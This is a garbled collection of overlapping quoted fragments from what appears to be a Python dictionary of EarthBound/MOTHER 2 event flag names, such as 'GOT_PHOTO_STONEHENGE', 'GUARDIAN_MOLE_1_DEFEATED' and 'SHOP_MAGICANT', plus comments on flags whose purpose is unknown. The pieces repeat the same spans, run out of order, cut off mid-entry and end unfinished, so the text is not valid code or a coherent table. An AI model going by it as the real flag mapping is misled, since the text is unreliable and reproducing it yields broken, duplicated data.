'LAST_ESCARGO_EXPRESS_CALL',", "'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE',", "(Something about \"Fancy Pokey\" in the Monotoli Building) -- Got kicked out of", "about Venus show about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684:", "you're near (0x02A0, 0x0D70) in a radius of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347:", "traffic jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown. Related to Boogey", "716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722:", "'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE',", "start?) # 680 (Something about Venus show about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682:", "560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566:", "'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE',", "to the script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390:", "'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED',", "house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE',", "'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something about talking to Paula's dad", "'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP',", "35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41:", "'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED',", "'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS',", "145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY',", "'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED',", "510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516:", "'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL',", "398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404:", "the Runaway Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about the City", "277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five", "138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR',", "'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO',", "Visibility flag for NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set", "Bus?) # 314 (Unknown. Something about the Runaway Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', #", "'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4',", "# 282 (Five moles defeated? How does this differ from 72?) # 283", "280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles defeated? How does this differ", "'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY',", "7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13:", "318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321 (Something about Paula's Dad", "'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672:", "43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49:", "of them might be responsible only for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436:", "416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422:", "57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63:", "314 (Unknown. Something about the Runaway Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown.", "'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED',", "81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87:", "154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???) # 157 (???) # 158 (???)", "the City Bus?) # 314 (Unknown. Something about the Runaway Five Bus?) 315:", "291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', #", "# 162 (???) # 163 (???) # 164 (???) 165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1',", "105: 'PATH_TO_TWOSON_OPEN', # 106 (???) 107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110", "(Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT',", "650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656:", "'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE',", "297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room 299:", "'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED',", "'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP',", "'DESERT_MINE_EXPANDED', # 175 (Unknown. Set when you receive the Pencil Eraser. Cleared when", "344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake Tess. This is only set if", "'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles defeated? How does this", "(???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1',", "'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775", "'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't", "436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442:", "'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572", "'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', #", "515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521:", "'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND',", "#459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777:", "3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9:", "'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833: 'PRESENT_TONY_COOKIE_5', 834: 'PRESENT_TONY_COOKIE_6',", "'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF',", "199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205:", "371 (???) 372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown. Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED',", "(Handles continue yes/no on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS',", "'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED',", "'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to the script for this battle", "'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something about the City Bus?) # 314", "Gourmet Yogurt Machine) # 377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380", "(???) 372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown. Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375:", "# TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', #", "# 198 (Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE',", "'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian doesn't reference this flag and never fights", "Eraser. Cleared when you defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING',", "394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400:", "181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187:", "'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT',", "names for MOTHER2/Earthbound # Luckily, every version uses the same flag IDs FLAG_NAMES", "'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP',", "'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED',", "576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582:", "176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182:", "'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3',", "'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE',", "120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126:", "'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone in Threed?) # 589", "435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441:", "'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC',", "'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER',", "'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN',", "even if you don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129:", "Set when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203:", "'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2',", "pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED',", "'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something about Lake Tess color palette) 288:", "346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352:", "311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something about the City Bus?) #", "710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716:", "434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated. One of them might", "505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511:", "'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER',", "# 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house door", "'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL',", "'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC',", "# 106 (???) 107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???) 111:", "546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552:", "373 (Unknown. Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown.", "'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN',", "'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 